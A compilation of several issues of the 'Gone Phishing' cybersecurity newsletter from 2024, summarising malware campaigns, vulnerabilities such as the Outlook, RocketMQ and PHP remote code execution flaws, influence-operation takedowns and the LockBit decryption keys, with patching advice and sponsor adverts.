Android, Windows, Mac users beware

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s reeling in the latest threats hook, line, and sinker! ๐ŸŽฃ๐ŸŽฃ๐ŸŽฃ

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿฅย ๐Ÿ“ฑ Android, Windows, Mac users beware! Pakistani malware lurks ๐Ÿ•Œ

  • ๐Ÿ“ง Microsoft Outlook flaw discovered that would allow zero-click attack

  • ๐ŸŽฃ Phishermen are using WARMCOOKIE as bait in backdoor campaign

Welcome to Hackistan ๐Ÿ˜ฌ๐Ÿ˜ฌ๐Ÿ˜ฌ

๐Ÿšจ Pakistan-linked Malware: Operation Celestial Force โ˜„๏ธ

Threat actors tied to Pakistan have been orchestrating a malware campaign called Operation Celestial Force since 2018. This campaign uses Android malware GravityRAT and Windows malware loader HeavyLift, managed via GravityAdmin.

๐Ÿ”’ Meet Cosmic Leopard

Cisco Talos tracks this adversary under the name Cosmic Leopard (aka SpaceCobra), showing tactical overlap with Transparent Tribe. The malware suite targets users in the Indian subcontinent, highlighting its success and ongoing evolution.

๐Ÿ“ฑ Multi-platform Threat

GravityRAT, first detected in 2018 as a Windows malware, now targets Android and macOS. It has been used to harvest sensitive info from military personnel in India and Pakistan Air Force, disguised as cloud storage, entertainment, and chat apps.

๐Ÿ”— Coordinated Attacks

Cosmic Leopard employs spear-phishing and social engineering to lure targets into downloading GravityRAT or HeavyLift. GravityAdmin coordinates these attacks, with campaigns like 'FOXTROT' and 'CRAFTWITHME' marking specific operations.

๐Ÿ–ฅ๏ธ HeavyLift's Role

HeavyLift, a new addition, targets Windows systems via malicious installers. It gathers system data and checks a C2 server for new payloads, functioning similarly on macOS.

๐Ÿ‘ฅ Targeting Defense and Government

This campaign mainly targets Indian defence, government, and tech sectors. Researchers emphasise the sophistication and long-term persistence of this operation.

Stay alert and secure! ๐ŸŒ๐Ÿ”’

Instantly calculate the time you can save by automating compliance

Whether youโ€™re starting or scaling your security program, Vanta helps you automate compliance across frameworks like SOC 2, ISO 27001, ISO 42001, HIPAA, HITRUST CSF, NIST AI, and more.

Plus, you can streamline security reviews by automating questionnaires and demonstrating your security posture with a customer-facing Trust Center, all powered by Vanta AI.

Instantly calculate how much time you can save with Vanta.

[Calculate now]

Zero-clicks given ๐Ÿ’€๐Ÿ’€๐Ÿ’€

๐Ÿšจ Zero-Click Vulnerability in Microsoft Outlook! ๐Ÿ’ป

A serious zero-click remote code execution (RCE) vulnerability, CVE-2024-30103, has been discovered in Microsoft Outlook. This flaw allows attackers to run arbitrary code via a specially designed email, with no user interaction needed.

๐Ÿ“ง Zero-Click Danger

CVE-2024-30103 is alarming because it doesn't require any action from the user. Just opening the malicious email is enough to compromise the system, making it a potent tool for cybercriminals.

๐Ÿ›ก๏ธ How It Works

Morphisec's analysis reveals that the vulnerability exploits the way Outlook processes certain email components. A buffer overflow is triggered when the crafted email is opened, allowing the attacker to execute arbitrary code with the user's privileges. This can lead to full system compromise, data theft, or malware spread.

๐ŸŒ Widespread Impact

With Microsoft Outlook's extensive use in both corporate and personal environments, CVE-2024-30103 poses a significant risk. Successful exploits could result in major data breaches, financial losses, and reputational damage for organisations.

๐Ÿ”ง Mitigation Steps

Microsoft has released a security patch to fix this issue. Users and administrators should immediately apply the latest updates. Enhanced email filtering and monitoring solutions are also recommended to detect and block malicious emails.

๐Ÿ’ฌ Expert Advice

"Zero-click vulnerabilities are particularly dangerous due to their lack of user interaction," a Morphisec spokesperson noted. "Organisations must prioritise patching and adopt multi-layered security measures to defend against sophisticated threats."

๐Ÿšจ Stay Informed and Protected

As of now, no known attacks exploiting CVE-2024-30103 are in the wild. Ensure your systems are updated and secure to mitigate risks from this critical vulnerability.

And thatโ€™s the way the WARMCOOKIE crumbles ๐Ÿช๐Ÿช๐Ÿช

๐Ÿšจ Job Scam Alert: WARMCOOKIE Backdoor ๐ŸŽฃ

Cybersecurity researchers have uncovered a phishing campaign using job-themed lures to deliver a Windows backdoor named WARMCOOKIE. This backdoor scouts victim networks to deploy additional payloads.

๐Ÿ“ง How It Works

Emails from fake recruitment firms like Hays and Michael Page prompt recipients to click a link for job details. After solving a CAPTCHA, a JavaScript file is dropped, initiating the download of WARMCOOKIE via PowerShell.

๐Ÿ›ก๏ธ Capabilities and Tactics

WARMCOOKIE fingerprints infected machines, captures screenshots, and drops more malicious programs. It uses a hard-coded command-and-control IP address and RC4 key for communication. The attack is tracked as REF6127.

๐Ÿ’ป Technical Breakdown

  • The phishing URL, hosted on compromised infrastructure, redirects victims to a landing page.

  • The backdoor establishes persistence using a scheduled task and performs anti-analysis checks to avoid detection.

WARMCOOKIEโ€™s functions include reading/writing files, executing commands via cmd.exe, fetching installed applications, and taking screenshots. It resembles tools used in prior campaigns targeting various sectors.

๐ŸŒ Global Reach

WARMCOOKIE is gaining popularity, targeting users worldwide. Itโ€™s part of sophisticated phishing campaigns exploiting familiar job recruitment themes to lure victims.

๐Ÿ“œ Related Campaigns

Trustwave SpiderLabs detailed another campaign using invoice-themed decoys and Windows search functionality in HTML code to deploy malware. The emails contain a ZIP file with an HTML that exploits the "search:" protocol, displaying a Shortcut (LNK) file that can trigger malicious operations when clicked.

๐Ÿ”— Stay Vigilant

While these attacks need user interaction, they cleverly exploit trust in familiar interfaces. Be cautious with email attachments and links, especially from unknown sources.

Stay alert and protect your systems! ๐ŸŒ๐Ÿ”’

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Critical Apache RocketMQ Flaw for RCE

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s blasting off to cyber-space ๐Ÿš€๐Ÿš€๐Ÿš€

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿš€ Apache RocketMQ hit by Muhstik botnet ๐Ÿค–

  • ๐Ÿ“ SASE Threat Report: Top tips for security ๐Ÿ”

  • ๐Ÿค– AI-powered Recall recalled by Microsoft ๐ŸŒ

Muh Muhstik brings all the bots to the yard ๐Ÿฆ๐Ÿง๐Ÿจ

๐Ÿšจ Muhstik Botnet Exploits Critical Apache RocketMQ Flaw for RCE ๐Ÿž

Security Alert! ๐Ÿ”๐Ÿ›ก๏ธ The Muhstik botnet is exploiting a critical vulnerability in Apache RocketMQ (CVE-2023-33246) to execute remote code, targeting Linux servers and IoT devices for Distributed Denial of Service (DDoS) attacks and cryptocurrency mining.

Key Details! ๐Ÿงฉ๐Ÿ”

Vulnerability: CVE-2023-33246, a critical flaw in Apache RocketMQ with a CVSS score of 9.8.

Targeted Systems: Linux servers and IoT devices.

Attack Vector: Remote code execution by forging RocketMQ protocol content or using the update configuration function.

Malware Capabilities! ๐Ÿฆ ๐Ÿ”

  • System Metadata Collection: Gathers information about the infected system.

  • Lateral Movement: Spreads to other devices over SSH.

  • C2 Communication: Connects to a command-and-control domain using IRC to receive further instructions.

  • DDoS Attacks: Utilises compromised devices to overwhelm target network resources.

Urgent Actions Required! ๐Ÿ›ก๏ธโšก

  • Patch Systems: Over 5,000 Apache RocketMQ instances remain vulnerable. Organisations must update to the latest version immediately.

  • Secure MS-SQL Servers: Apply strong passwords and change them regularly to prevent brute-force attacks.

  • Adopt Best Practices: Move away from using outdated PHP CGI and implement secure alternatives like Mod-PHP, FastCGI, or PHP-FPM.

Expert Insights! ๐Ÿง ๐Ÿ’ก

"Muhstik is a notorious threat that exploits known vulnerabilities in web applications to propagate its malware," noted security researcher Nitzan Yaakov. "With the ability to bypass protections through minor features, this vulnerability highlights the need for robust security measures."

Ongoing Threats! ๐ŸŒโš”๏ธ

  • Crypto Mining Activity: Previous campaigns involving Muhstik have included cryptomining post-infection, leveraging the electrical power of compromised machines.

  • Brute-Force Attacks: The AhnLab Security Intelligence Center (ASEC) has reported that poorly secured MS-SQL servers are frequent targets for various malware types, including ransomware and remote access trojans.

Conclusion ๐ŸŒŸ๐Ÿ”’

With the critical nature of CVE-2023-33246 and the active exploitation by the Muhstik botnet, it's imperative for organisations to act swiftly. Updating Apache RocketMQ to the latest version and securing MS-SQL servers are crucial steps in mitigating these risks.

Stay vigilant and protect your systems from this emerging threat! ๐ŸŒ๐Ÿ›ก๏ธ

Whatever you SASE ๐Ÿ˜ฌ๐Ÿ˜ฌ๐Ÿ˜ฌ

๐Ÿšจ Evolving Threat Landscape Calls for Comprehensive Cyber Threat Intelligence ๐Ÿ›ก๏ธ

As cyber threats evolve, organisations need a unified approach to integrate insights from external data, inbound and outbound threats, and network activity for a complete cybersecurity posture.

Cato SASE Threat Report ๐Ÿ“Š๐Ÿ”’

Cato's Cyber Threat Research Lab (Cato CTRL) has released its first SASE threat report, offering in-depth insights into enterprise and network threats using the MITRE ATT&CK framework. The report draws from extensive data sources, including:

  • Data from 2,200+ customers.

  • 1.26 trillion network flows.

  • 21.45 billion blocked attacks.

What is Cato CTRL? ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Cato CTRL combines top human intelligence with comprehensive network and security insights, powered by Cato's AI-enhanced, global SASE platform.

Top 8 Findings:

AI Adoption ๐Ÿค–

AI tools like Microsoft Copilot and OpenAI ChatGPT are widely adopted.

Hacker Forum Insights ๐Ÿ’ฌ

Hacker forums reveal trends such as enhanced tools using LLMs and services for fake credentials and deep fakes.

Brand Spoofing ๐Ÿ”

Brands like Booking, Amazon, and eBay are being spoofed for fraud.

Lateral Movement in Networks โ†”๏ธ

Attackers exploit unsecured protocols:

  • 62% HTTP traffic.

  • 54% telnet traffic.

  • 46% SMB v1/v2 traffic.

Unpatched Systems Threat ๐Ÿ› ๏ธ

Unpatched systems, like those vulnerable to Log4J, remain significant threats.

Industry-Specific Exploits ๐Ÿญ

Different industries face distinct threats, such as Endpoint Denial of Service and Credential Access exploitation.

Context in Threat Detection ๐Ÿ”

Contextual understanding and AI/ML algorithms are crucial for detecting suspicious activity.

Low DNSSEC Adoption ๐ŸŒ

Despite its importance, DNSSEC adoption is only 1%.

Conclusion ๐Ÿ“–

For more detailed insights and to understand the broader threat landscape, read the full SASE Threat Report.

Stay informed, stay protected! ๐Ÿ›ก๏ธ

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

Stay ahead of the curve with Presspool.ai! ๐Ÿš€ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." ๐Ÿค“๐Ÿ’ก Thatโ€™s us, alright! ๐Ÿคต How about you? Visionary AI executive, much? ๐Ÿ‘€

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business ๐Ÿค–๐Ÿ‘ฉโ€๐Ÿ’ป๐ŸŒ

Rest assured, the process is very straightforward.

You simply:

๐Ÿ†• Sign Up & Create Campaign

๐Ÿ“Š Define your audience, budget, and message to captivate your audience.

๐Ÿš€ Launch your campaign, as Presspoolโ€™s AI matches it with ideal newsletter audiences for optimal reach and conversions. ๐ŸŽฏ

๐Ÿ•ต๏ธ Finally, you leverage real-time analytics to track performance and refine future strategies. ๐Ÿ“ˆ Elevate your marketing game and stay informed with Presspool.ai! ๐ŸŒŸ Simples! ๐Ÿฆฆ

Presspool.aiย ๐Ÿ“ฐ๐ŸŠ๐Ÿค– may just have what you need to succeed. And if the product isnโ€™t for you, the newsletter alone is a gamechanger. And we know newsletters ๐Ÿ˜‰

Recalling all cars! ๐Ÿ“ข๐Ÿ“ข๐Ÿ“ข

๐Ÿšจ Microsoft to Disable Controversial AI-Powered Recall Feature by Default ๐Ÿšซ๐Ÿ”

Microsoft announced it will disable the controversial AI-powered Recall feature by default and make it opt-in starting June 18, 2024, in response to significant backlash from the security and privacy community.

About Recall ๐Ÿ”Ž

  • What it does: Recall captures screenshots of users' screens every five seconds, creating an "explorable visual timeline" to surface relevant information.

  • Availability: Exclusively on Copilot+ PCs.

Controversy โš ๏ธ

  • Privacy Concerns: Critics argue that Recall could expose sensitive information, such as documents and messages, making users vulnerable to malicious actors.

  • Negative Reactions: Security experts like WIRED's Andy Greenberg labelled Recall as "unrequested, pre-installed spyware," and Microsoft was criticised for secrecy during development.

Microsoft's Response ๐Ÿ’ก

User Control:

  • Users will have full control over Recall, with an option to opt out of saving screenshots.

Security Enhancements:

  • Biometric authentication via Windows Hello is required to enable Recall.

  • Encryption for the search index database.

  • Snapshots decrypted only upon user authentication.

Local Processing:

  • All Recall data is stored and processed locally on-device, not shared with external entities.

User Experience ๐Ÿ‘ค

  • Opt-in Process: Users will go through a new setup process to enable Recall.

  • Visual Indicators: Recall will be pinned to the taskbar with a system tray icon indicating when snapshots are being saved.

Enterprise Controls ๐Ÿ•น๏ธ

IT administrators in enterprise environments can disable Recall for managed devices, but cannot enable it.

Industry Reaction ๐Ÿญ

Positive Steps: Security researcher Kevin Beaumont praised the move to make Recall opt-in, highlighting the importance of user choice to avoid potential security issues.

Microsoft's Commitment to Security ๐Ÿ”

  • The decision is part of Microsoft's broader Secure Future Initiative (SFI), emphasising security above other priorities.

  • CEO Satya Nadella stressed the importance of prioritising security in all aspects of Microsoft's operations.

  • Microsoft's reversal on Recall aims to address privacy and security concerns while gathering user feedback to refine the feature. For more details, read the full announcement from Microsoft.

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Google has dismantled 1,320 YouTube channels

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that reels in the cyber-threats and doesnโ€™t believe in catch and release ๐Ÿ‘จโ€๐ŸŽฃโš“

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿงน Google cleans house. 1000s of Chinese accounts removed ๐Ÿ—‘๏ธ

  • ๐ŸŒ Microsoft warns of hackers targeting Azure vulnerabilities ๐Ÿ‘จโ€๐Ÿ’ป

  • ๐Ÿงช PHP flaw exposes Windows servers to remote code attacks ๐Ÿ›ฐ๏ธ

Google doesnโ€™t Play. #bullinaChinashop ๐Ÿ‚๐Ÿ‰๐Ÿผ๐Ÿฅข๐Ÿ’€

๐Ÿšจ Google Shuts Down PRC Influence Campaigns ๐Ÿšซ

Major Takedown! ๐Ÿ› ๏ธ๐Ÿ“บ Google has dismantled 1,320 YouTube channels and 1,177 Blogger blogs tied to a coordinated influence operation linked to the People's Republic of China (PRC). The content, in Chinese and English, focused on China and U.S. foreign affairs.

Key Actions! ๐Ÿ“‰๐Ÿ“ฐ

  • PRC Operation: Thousands of accounts across YouTube, Blogger, Ads, and AdSense terminated.

  • ย Indonesia Influence: Accounts promoting the ruling party were shut down.

  • Russian Network: 378 YouTube channels promoting pro-Russia content and disparaging Ukraine were taken down.

Global Reach! ๐ŸŒ๐Ÿ’ป

  • Pakistan: 59 channels sharing Urdu content critical of local political figures.

  • ย France: 11 channels with French content critical of political figures.

  • Russia: 11 channels supporting Russia and criticising Ukraine.

  • Myanmar: 2 channels supporting the military government.

Emerging Threats! ๐Ÿšจ

OpenAI and Meta disrupted a Tel Aviv-based firm, Stoic, spreading pro-Israel messaging in the U.S. and Canada amid the Gaza conflict. This campaign included Facebook comments and links to operation websites, often criticised by genuine users as propaganda.

Olympic Concerns! ๐Ÿ…๐Ÿ”

Microsoft warns of escalating Russian disinformation campaigns targeting the 2024 Paris Olympics. AI-generated content is used to undermine the Games and deter spectators through fabricated terrorism threats and claims of IOC corruption.

Stay Alert! ๐Ÿ”’

As these coordinated operations show, the battle against disinformation is ongoing. Stay informed and critical of the content you consume online.

Instantly calculate the time you can save by automating compliance

Whether youโ€™re starting or scaling your security program, Vanta helps you automate compliance across frameworks like SOC 2, ISO 27001, ISO 42001, HIPAA, HITRUST CSF, NIST AI, and more.

Plus, you can streamline security reviews by automating questionnaires and demonstrating your security posture with a customer-facing Trust Center, all powered by Vanta AI.

Instantly calculate how much time you can save with Vanta.

[Calculate now]

Microsoft: Itโ€™s a big problem, I can Azure you ๐Ÿ˜ฌ๐Ÿ˜ฌ๐Ÿ˜ฌ

๐Ÿšจ Microsoft Warns of Azure Service Tags Abuse โš ๏ธ

Potential Threat! ๐Ÿ’ปโš ๏ธ Microsoft is alerting users about the risk of malicious actors exploiting Azure Service Tags to forge requests from trusted services, potentially bypassing firewall rules and gaining unauthorised access to cloud resources.

Key Insights! ๐Ÿ”‘๐Ÿ”

  • Service Tags Risk: Using service tags as the sole mechanism for vetting incoming traffic can be risky. They should not be considered a security boundary but rather a routing mechanism with validation controls.

  • Affected Services: Tenable identified vulnerabilities in 10 Azure services, including Azure DevOps, Azure Machine Learning, and Azure API Management.

How It Works! ๐Ÿ› ๏ธ๐Ÿ”“

Attackers could potentially craft web requests that appear to be from a trusted service, gaining access to resources in another tenant if the target relies solely on service tags for inbound traffic.

Microsoft's Response! ๐Ÿ“

  • Guidance Update: Documentation now states that service tags alone aren't sufficient to secure traffic.

  • Security Measures: Customers should review and enhance their security protocols to authenticate trusted network traffic.

Tenable's Findings! ๐Ÿง

Tenable researcher Liv Matan emphasised that attackers could impersonate trusted Azure services, bypassing network controls based on service tags, which are often used to prevent public access to internal assets and services.

Top Tips ๐Ÿ›ก๏ธ

  • Enhance Validation: Use additional validation controls alongside service tags.

  • Review Configurations: Regularly audit and update firewall rules and authentication mechanisms.

  • Stay Informed: Keep up with Microsoft's updates and security recommendations.

Stay vigilant and ensure your Azure configurations are secure! ๐ŸŒ๐Ÿ”’

Hmm, whatโ€™s the PHP threat level? ๐Ÿฅฝ๐Ÿงช๐Ÿ”ฌ

๐Ÿšจ Critical PHP Flaw Exposes Servers to Remote Code Execution โš ๏ธ

New Vulnerability Alert! ๐Ÿ’ป A critical security flaw in PHP has been identified, potentially allowing remote code execution (RCE) on Windows systems. Tracked as CVE-2024-4577, this CGI argument injection vulnerability affects all PHP versions on Windows.

Key Details! ๐Ÿ”

  • Vulnerability: CVE-2024-4577 allows bypassing protections from CVE-2012-1823.

  • Affected Versions: All PHP versions on Windows; fixed in PHP 8.3.8, 8.2.20, and 8.1.29.

  • Locale-Specific: Default vulnerability in XAMPP installations using Traditional Chinese, Simplified Chinese, or Japanese locales.

Research Findings! ๐Ÿงช๐Ÿ”“

DEVCORE security researcher Orange Tsai highlights the flaw's origin in the Best-Fit feature of Windows encoding conversion. This allows unauthenticated attackers to bypass previous protections and execute arbitrary code on remote PHP servers.

Rapid Response! โšก

  • Patch Release: Fixes available as of May 7, 2024.

  • Security Recommendations: DEVCORE advises switching from outdated PHP CGI to more secure alternatives like Mod-PHP, FastCGI, or PHP-FPM.

Exploitation in the Wild! ๐ŸŒ๐Ÿ’ฃ

  • Immediate Detection: The Shadowserver Foundation detected exploitation attempts within 24 hours of disclosure.

  • Proof of Concept: watchTowr Labs successfully developed an exploit, emphasising the urgency of applying patches.

Expert Advice! ๐Ÿ“ข

"A nasty bug with a very simple exploit," noted security researcher Aliz Hammond. "Systems running affected configurations under the specified locales must patch immediately due to the high risk of mass exploitation."

Top Tips ๐Ÿ›ก๏ธ

  • Apply Updates: Ensure PHP installations are updated to the latest versions.

  • Review Configurations: Shift to secure execution methods like Mod-PHP, FastCGI, or PHP-FPM.

  • Stay Informed: Monitor security advisories and apply patches promptly.

Stay secure and protect your PHP servers from this critical vulnerability! ๐ŸŒ๐Ÿ”’

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Sticky Werewolf is back and attacking a pharmaceutical company

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that's casting out the scams and netting you the latest security tips! ๐ŸŽฃ๐ŸŽฃ๐ŸŽฃ

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿบ Sticky Werewolf expands operations to Russia, Belarus ๐ŸŒ

  • ๐Ÿ•ต๏ธ LightSpyโ€™s macOS variant has advanced surveillance ๐Ÿ“ก

  • ๐Ÿ” 7000 LockBit ransomware decryption keys released by FBIย ๐Ÿ‘ฎย 

Itโ€™s a real howler! ๐Ÿบ๐Ÿบ๐Ÿบ

Happy Big Sky GIF by ABC Network

Gif by abcnetwork on Giphy

๐Ÿšจ Sticky Werewolf Strikes Again! ๐Ÿบ

New Targets Unveiled! ๐Ÿญโœˆ๏ธ๐Ÿ’Š Sticky Werewolf is back, now attacking a pharmaceutical company, a Russian microbiology research institute, and the aviation sector. Previously focused on government entities, these hackers have broadened their horizons.

Phishing Tactics! ๐ŸŽฃ๐Ÿ“ง๐Ÿ’ป

  • Method: Phishing emails with malicious links.

  • Payload: LNK files in RAR archives leading to malware stored on WebDAV servers.

  • Outcome: Delivers Remote Access Trojans (RATs) like NetWire.

Complex Infection Chain! ๐Ÿ”—๐Ÿ“๐Ÿฆ 

Opening LNK files from these emails triggers a chain reaction:

  1. Executes a binary hosted on WebDAV.

  2. Runs an obfuscated batch script.

  3. Launches an AutoIt script to inject the final payload, evading security software.

What's Next? ๐Ÿš€๐Ÿ”

Sticky Werewolf uses CypherIT variants to deliver RATs like Rhadamanthys and Ozone.ย Attribution remains unclear, though geopolitical clues hint at potential pro-Ukrainian origins.

Other Wolves on the Prowl! ๐Ÿบ

Sapphire Werewolf: Over 300 attacks on various Russian sectors.

Fluffy Wolf & Mysterious Werewolf: Use spear-phishing to deploy malware like Remote Utilities, XMRig miner, WarZone RAT, and RingSpy backdoor.

Stay vigilant and protect your digital realm! ๐Ÿ›ก๏ธ๐Ÿ”’๐Ÿ’ป

The LightSpy who hacked me ๐Ÿ•ต๏ธ๐Ÿ•ต๏ธ๐Ÿ•ต๏ธ

๐Ÿšจ LightSpy Hits macOS! ๐Ÿ’ป

New Threats Uncovered! ๐Ÿ’ป๐Ÿ“ฑ Cybersecurity researchers have found that LightSpy spyware, initially targeting iOS users, has a macOS variant. This cross-platform malware can infect Android, iOS, Windows, macOS, Linux, and various routers!

Key Findings! ๐Ÿง๐Ÿ”

  • Exploits Used: CVE-2018-4233 and CVE-2018-4404.

  • Targets: macOS version 10, primarily via Safari WebKit flaws.

  • Payloads: Privilege escalation exploit, encryption/decryption utility, and ZIP archives.

How It Works! ๐Ÿ”—๐Ÿ› ๏ธ

  • Rogue HTML: Triggers code execution.

  • Binary as PNG: Delivers malicious code.

  • Shell Script: Fetches additional payloads.

  • Persistence: Sets up with "update" file acting as a loader.

Capabilities! ๐Ÿ›ก๏ธ๐ŸŽค๐Ÿ“ธ

LightSpy's macOS variant uses 10 plugins to:

  • Capture audio and photos

  • Record screen activity

  • Extract and delete files

  • Execute shell commands

  • Harvest browser data and iCloud Keychain info

  • Perform network discovery

In the Wild! ๐ŸŒ๐Ÿ“…

Active since January 2024, LightSpy's macOS variant has affected around 20 devices, mostly test units. Despite limited reach, its sophisticated attack chain poses significant risks.

Geopolitical Impact! ๐ŸŒ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Reports of Pegasus spyware attacks on activists in Latvia, Lithuania, and Poland highlight the ongoing cyber espionage targeting Russian- and Belarusian-speaking journalists since at least 2020.

Stay informed and secure! ๐Ÿ›ก๏ธ๐Ÿ”’๐ŸŒ

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

Stay ahead of the curve with Presspool.ai! ๐Ÿš€ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." ๐Ÿค“๐Ÿ’ก Thatโ€™s us, alright! ๐Ÿคต How about you? Visionary AI executive, much? ๐Ÿ‘€

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business ๐Ÿค–๐Ÿ‘ฉโ€๐Ÿ’ป๐ŸŒ

Rest assured, the process is very straightforward.

You simply:

๐Ÿ†• Sign Up & Create Campaign

๐Ÿ“Š Define your audience, budget, and message to captivate your audience.

๐Ÿš€ Launch your campaign, as Presspoolโ€™s AI matches it with ideal newsletter audiences for optimal reach and conversions. ๐ŸŽฏ

๐Ÿ•ต๏ธ Finally, you leverage real-time analytics to track performance and refine future strategies. ๐Ÿ“ˆ Elevate your marketing game and stay informed with Presspool.ai! ๐ŸŒŸ Simples! ๐Ÿฆฆ

Presspool.aiย ๐Ÿ“ฐ๐ŸŠ๐Ÿค– may just have what you need to succeed. And if the product isnโ€™t for you, the newsletter alone is a gamechanger. And we know newsletters ๐Ÿ˜‰

Theyโ€™re chomping at the LockBit ๐Ÿ”๐Ÿ”๐Ÿ”

๐Ÿšจ FBI Unlocks Decryption Keys for LockBit Victims! ๐Ÿ›ก๏ธ

Big News! ๐Ÿ”“๐Ÿ’ป The FBI has announced they have over 7,000 decryption keys to help victims of the LockBit ransomware recover their data for free! If you think youโ€™ve been affected, visit the FBIโ€™s Internet Crime Complaint Center at ic3.gov.

Key Highlights! ๐Ÿ—๏ธ๐Ÿ”

  • LockBitโ€™s Reach: Linked to 2,400 attacks globally, with 1,800 in the U.S.

  • Operation Cronos: Dismantled LockBitโ€™s online infrastructure in February 2024.

  • Key Figure: Dmitry Yuryevich Khoroshev, the alleged administrator, denies involvement but was outed by authorities.

Victim Assistance! ๐Ÿ†˜

FBI Cyber Division Assistant Director Bryan Vorndran encourages victims to reach out. He also warns that paying ransoms doesnโ€™t guarantee data safety, and victims may still face future extortion.

Ransomware Reality! ๐Ÿ“Š๐Ÿ”

  • Recovery Rate: Organisations hit by ransomware recover only 57% of compromised data on average, according to the Veeam Ransomware Trends Report 2024.

  • Emerging Threats: New ransomware players like SenSayQ and CashRansomware are on the rise, refining their tactics.

Evolving Tactics! โš™๏ธ๐Ÿฆ 

LockBit and other ransomware groups are constantly evolving. The TargetCompany ransomware now uses a new Linux variant to target VMWare ESXi systems, exploiting Microsoft SQL servers for initial access.

Stay Vigilant! ๐Ÿšจ

The FBI's efforts are a big step in combating ransomware, but it's crucial for organisations to stay vigilant and prepared. Protect your data, and don't let cybercriminals hold you hostage!

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

